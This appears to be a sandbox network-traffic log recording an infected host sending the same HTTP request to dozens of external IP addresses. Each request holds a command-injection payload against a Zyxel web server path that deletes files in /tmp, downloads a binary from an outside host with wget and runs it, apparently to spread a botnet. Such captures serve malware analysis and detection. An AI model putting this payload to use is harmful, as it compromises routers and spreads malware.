                              Mar 31, 2024 08:41:30.913882017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5154192.168.2.135800491.220.101.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.913963079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5155192.168.2.135846458.108.207.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.914022923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5156192.168.2.1352122188.33.229.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.914083004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5157192.168.2.133409493.28.149.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.914146900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5158192.168.2.1336440158.100.126.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.914216995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5159192.168.2.1355956157.240.218.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.914275885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5160192.168.2.1336100186.154.126.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.914351940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5161192.168.2.1345044220.9.255.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.914422989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5162192.168.2.1355304181.97.58.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.914473057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5163192.168.2.133402097.37.230.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.914546967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5164192.168.2.1347316203.215.253.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.914625883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5165192.168.2.135243880.99.3.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.914721012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5166192.168.2.1341990174.111.17.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.914767981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5167192.168.2.1354950109.189.43.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.914834976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5168192.168.2.1354354159.107.111.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.914896965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5169192.168.2.135459859.105.212.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.914923906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5170192.168.2.1347280169.197.223.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.915000916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5171192.168.2.133606432.169.209.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.915062904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5172192.168.2.1353598110.223.64.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.915127993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5173192.168.2.1350392207.176.238.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.915206909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5174192.168.2.1338316198.155.185.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.915263891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5175192.168.2.134974452.200.9.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.915313959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5176192.168.2.134145049.179.133.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.915374041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5177192.168.2.135656297.1.206.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.915441036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5178192.168.2.1336072141.163.76.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.915509939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5179192.168.2.134262018.164.226.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.915559053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5180192.168.2.1351764137.255.175.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.915633917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5181192.168.2.1357334121.232.126.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.915671110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5182192.168.2.134150046.230.181.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.915755987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5183192.168.2.1359572150.232.168.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.915864944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5184192.168.2.133666862.193.141.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.915898085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5185192.168.2.1341658217.215.155.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.915975094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5186192.168.2.1345524131.167.159.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.916033983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5187192.168.2.1346982132.99.12.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.916109085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5188192.168.2.135133651.41.199.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.916145086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5189192.168.2.135758070.218.233.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.916214943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5190192.168.2.1354770147.153.77.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.916273117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5191192.168.2.1360300110.193.216.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.916332960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5192192.168.2.1351342106.176.17.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.916413069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5193192.168.2.1355676212.220.36.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.916495085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5194192.168.2.133408245.242.55.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.916578054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5195192.168.2.133504247.69.74.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.916642904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5196192.168.2.1354180137.98.10.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.916712999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5197192.168.2.1351056207.53.55.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.916763067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5198192.168.2.1354784183.116.53.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.916817904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5199192.168.2.135531295.100.227.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.916889906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5200192.168.2.135328663.131.254.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.916944981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5201192.168.2.1351046153.183.67.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.917012930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5202192.168.2.135883651.234.172.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.917071104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5203192.168.2.1343944199.187.64.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.917120934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5204192.168.2.1336884182.208.63.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.917196989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5205192.168.2.1334166113.72.229.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.917249918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5206192.168.2.1360332105.119.51.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.917309999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5207192.168.2.1350636160.58.152.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.917381048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5208192.168.2.1350666196.67.117.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.917429924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5209192.168.2.1343290113.144.212.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.917496920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5210192.168.2.1336656120.108.110.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.917582989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5211192.168.2.135952465.83.5.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.917638063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5212192.168.2.133399242.54.124.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.917704105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5213192.168.2.1343556179.159.62.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.917757034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5214192.168.2.1340936185.191.124.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.917819977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5215192.168.2.1346832219.141.132.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.917913914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5216192.168.2.1332904115.255.59.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.917929888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5217192.168.2.1338408189.80.51.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.917995930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5218192.168.2.135636237.117.48.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.918062925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5219192.168.2.13547164.122.194.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.918106079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5220192.168.2.1342164100.218.62.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.918181896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5221192.168.2.13547905.4.81.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.918273926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5222192.168.2.1355896139.142.24.22443
                              TimestampBytes transferredDirectionData
